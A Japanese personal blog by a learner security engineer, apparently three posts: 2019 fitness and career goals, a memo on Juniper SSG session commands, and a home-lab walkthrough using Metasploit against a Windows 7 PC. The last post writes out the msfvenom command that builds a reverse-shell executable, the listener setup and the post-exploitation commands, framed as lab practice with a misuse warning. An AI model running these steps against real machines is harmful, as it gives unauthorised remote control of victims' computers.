2019年の計画を一緒に立てませんか

Pocket

こんにちは。30代未経験ネットワークエンジニアのshin@セキュリティエンジニアになるため勉強中です。

今回は初の試みで、2019年の目標を立ててみたいと思います。

もしまだ目標を立てていない人がいましたら一緒にやりましょう。

なぜこのようなことを行うかというと、去年よりメンタリストDaiGoさんのニコニコチャンネルに入会しまして、その放送の中であった「科学的に正しい計画の立て方」の放送や、「倒れない計画術」という本を読み、2019年は計画を立てて観ようと思い、どうせならブログに載せて自分を追い込んでみようと思いこのブログを書いています(笑)

それでは、本題に入ります。

2019年の目標

2019年は3つの目標を立てました。

それでは、それぞれ発表させていただきます。

1.腹筋を割る

まず一つ目は、腹筋を割るという目標です。
やっぱり一度くらいは腹筋を割りたいなという思いから目標にしました。

腹筋をやるために行うこと

・リーンゲインズ
リーンゲインズとは、食べる時間8時間に制限するという食事法です。
詳しい内容は、以下パレオな男のブログを参照してください。

「8時間ダイエット」(リーンゲインズ)を1年間ほど続けてみた感想

なお、プチ断食を行うと集中力もアップするということで、私は朝食を抜いて昼の12時~20時の間でご飯を食べるようにしています。

2018年の5月くらいから初めて、12月の健康診断で体脂肪が

「21.8%→13.7%」まで減りました!!

これはすごい!

腹筋が割れるには体脂肪率10%を切らないといけないようなので、もうしばらくこのまま、リーンゲインズを続けていこうと思います。

当面の目標としては、3月までに12%まで減らしたいなと思っています。

 

・筋トレ

結局、腹筋割れたけどヒョロヒョロじゃ格好悪いんで、筋肉をつける必要があるので、筋トレを行います。

メニューは、こんな感じです。

●ダンベルプレス 10回×2セット
●デッドリフト 10回×2セット
●スプリットスクワット 10回×2セット

 

2.副業で3000円~5000円稼ぐ

二つ目は副業でお金を稼ぎ体という思いがあり、目標に設定してみました。

ちなみに、3000~5000円というのは、月額ではなく年額です。

何故金額に幅を持たせているかというと、DaiGoさんの放送で、目標は具体的すぎると逆に目標が達成できなくなるということなので幅を持たせています。

目標達成のためにやること

・クラウドワークスなどのサイトへ月に一つは応募する

まずは、仕事を取れなくてもいいので、応募するところから始めようかと思います。

 

3.セキュリティエンジニアの仕事をする

三つめは今も勉強しているセキュリティエンジニアの仕事をするということです。

今年はセキュリティエンジニア元年にしたいと思い目標設定しました。

目標達成のためにやること

・3月までに求人公募に1社応募する
転職してでもセキュリティエンジニアになるため、求人に応募します!

・セキュリティのイベントに参加する
2018年はCTF BegginerやOWASPなどのイベントに参加しましたので、今年も引き続き参加して技術を高めたいと思います。

 

ここには詳細は記載していませんが、目標を達成するためのテクニックとして、「if-thenルール」や、「プロセスビジュアライゼーション」、「チートデイ」などを駆使しています。

一つ簡単にご紹介しておくと、「チートデイ」とは、わざと挫折する日を事前に計画しておくというテクニックです。

そもそも人は計画をするときに、すべて上手くいくと思込み計画を立ててしまうそうです。
実際には、飲み会や、仕事/プライベートが忙しいなどの理由で立てた目標が達成できなさそうと思ったとき、人は「どうにでもなれ効果」というものが働いて目標を放棄してしまうそうです。

それを防ぐためにもあえて、先にスぺジュールに挫折する日(この日は何食べてもOK、運動しなくてもOK、ずっと動画みてもOK)を作っておくといいそうです。

そのため、私は第2、4の土曜日はチートデイに設定しました!

まずは、この目標に対してのやるべきことを3月まで継続していき、4月に報告の記事をあげたと思います。

 

2019年の目標を立てていたい方がいれば、一緒に今年は何かを計画を立てて実行してみませんか?
お互い監視できるような仲間がいればきっと楽しく目標達成できるかもと思いこの記事を書きました。

以上です。ありがとうございました。

↓は計画を立てた時に使用した参考本です。

Pocket

SSGでセッションを確認する方法

Pocket

30代未経験ネットワークエンジニアのshin@セキュリティエンジニアを目指して勉強中です。

今回は、SSGのセッションの確認方法について書きたいと思います。
仕事で使うことがあり備忘録程度の簡単なメモです。

確認手順

SSGにTeraTermなどで、ログインする

CLIで以下のコマンドを入力する。
入力後、現在使用しているセッションが表示されます。

get session
Enter

「get session」コマンドには、色々なオプションコマンドがあります。
get sessionで?を押すと以下のコマンドが出ます。

> redirect output
| match output

dst-ip destination ip address
dst-mac destination mac address
dst-port destination port number or range
id show sessions with id
ike-nat show ike-nat ALG info
info show sessions summary info
ipsec-nat show ipsec pinhole ALG info
policy-id policy id
protocol protocol number or range
rm show sessions for resource management
、service show sessions with service type
src-ip source ip address
src-mac source mac address
src-port source port number or range
tunnel show tunnel sessions
vsd-id get vsd-id specified sessions

もし、宛先IPアドレスや、送信元IPアドレスで検索したい場合は、dst-ip、src-ipを使ってみましょう。

例)宛先IPアドレスに「10.10.10.10」を指定したい場合

get session dst-ip  10.10.10.10
Enter

もし、宛先、送信元を指定したい場合はこんな感じで入力しましょう。

get session dst-ip  10.10.10.10 src-ip 192.168.1.1
Enter

セッションを削除したい場合

セッションを削除したい場合は、以下のコマンドを使用します。

clear session
Enter

もし、削除したいセッションを指定したい場合は、「get session」と同じオプションが使用できます。

例)宛先IPアドレスに「10.10.10.10」を指定して削除する場合

clear session dst-ip  10.10.10.10
Enter

 

以上です。

SSGは少なくなっているけど、まだしばらくはあると思いますので、もしSSGのセッションを見たい場合は参考にしてみてください。

ありがとうございました。

Pocket

Metasploitを使ってWindows7を遠隔操作してみた

Pocket

明けましておめでとうございます。今年もよろしくお願いします!

30代未経験ネットワークエンジニアのshin@セキュリティエンジニアになるため勉強中です。

新年最初は、Metasploitを使ってWindows7を遠隔操作してみたと思います。

Metasploitとは、ペネトレーションテストや脆弱性診断で使用されるツールですので、自分の管理しているPCにのみ使用してください。
※Kali Linuxを使用します。もちろん悪用厳禁です!

流れ

  1. Kali Linuxでリバースシェルを行うためのEXEを作成
  2. Metasploitでシェルを待ち受ける
  3. Windows7でEXEを実行
  4. Kali LinuxでWindows7の情報を取得

今回の環境や、構成などは次のようになります。

環境

・ターゲットPC(Windows7)
・攻撃用PC(Kali Linux)

構成

・Kali Linux
 IPアドレス:192.168.89.169

・Windows7
 IPアドレス:192.168.89.157

今回の目的

ターゲットPCをMetasploitを使って攻撃して、ターゲットPCの「ipconfig」コマンドをKali Linuxで表示することまでやります。

それでは、実際にやっていきましょう。

手順

1.Kali Linuxの左のショーカットから「端末」を選択

2.Metasploitを起動するため、次のコマンドを実行

・msfconsole

3.ペイロードを作成するため、次のコマンドを実行(EXEを作成)

・msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.89.169 -f exe -o /root/windows7_test.exe

※LHOST:Kali LinuxのIPアドレスを入力

↓ 実行後に表示された結果

[*] exec: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.89.169 -f exe -o /root/windows7_test.exe[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload[-] No arch selected, selecting arch: x86 from the payloadNo encoder or badchars specified, outputting raw payloadPayload size: 341 bytesFinal size of exe file: 73802 bytesSaved as: /root/windows7_test.exe

4.作成した、「windows7_test.exe」ファイルをWindows7へコピーします

5.Kali Linuxでリバースシェルを待ち受けるためのコマンドを実行

・use exploit/multi/handler
・set payload windows/meterpreter/reverse_tcp
・set LHOST 192.168.89.169

ここまで、設定できたら「show options」コマンドで設定が間違っていないかを確認します。

・show options

↓結果はこんな感じ

6.問題なければ、先にWindows7側で「windows7_test.exe」を実行します。
※順番は7番が先でも問題ありません。

7. 「exploit」コマンドを実行

・exploit

msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.89.169:4444
[*] Sending stage (179779 bytes) to 192.168.89.157
[*] Meterpreter session 1 opened (192.168.89.169:4444 -> 192.168.89.157:49159) at 2019-01-03 11:00:01 +0900

meterpreter >

8.「meterpreter>」が表示されていれば、Windows7とのセッションが確立しています。

※Windows7の「netstat」を前後で取得しました。
セッションが確立されていることが確認できます。

確立前

確立後

9.Windows7を遠隔操作してみます
Kali Liuxで以下のコマンドを入力してみましょう。

・getuid
・ls
・ifconfig


Windows7の現在のユーザが見れたり、カレントディレクトリ、IPアドレスの情報が確認できました。以上で、今回の目的を達成しましたのでこれで完了です。

補足

もしも、Windows7のコマンドプロンプトを表示したい場合は、「shell」と入力してみてください。
そうすると、普段使用しているコマンドプロンプト画面を表示することが出来ます。
元の状態に戻したい場合は、「exit」を入力

動画も取得しましのでよかったら是非見てください。

まとめ

今回は、Merasploitを使用して、Windows7のシェルを使用することが出来ました。
実際の攻撃とは違うと思いますが、少しでも参考になればと思います。

以上です。ありがとうございました。

今回の参考本です。
今回の内容よりも、もっと詳しいことが書いてあります。

Pocket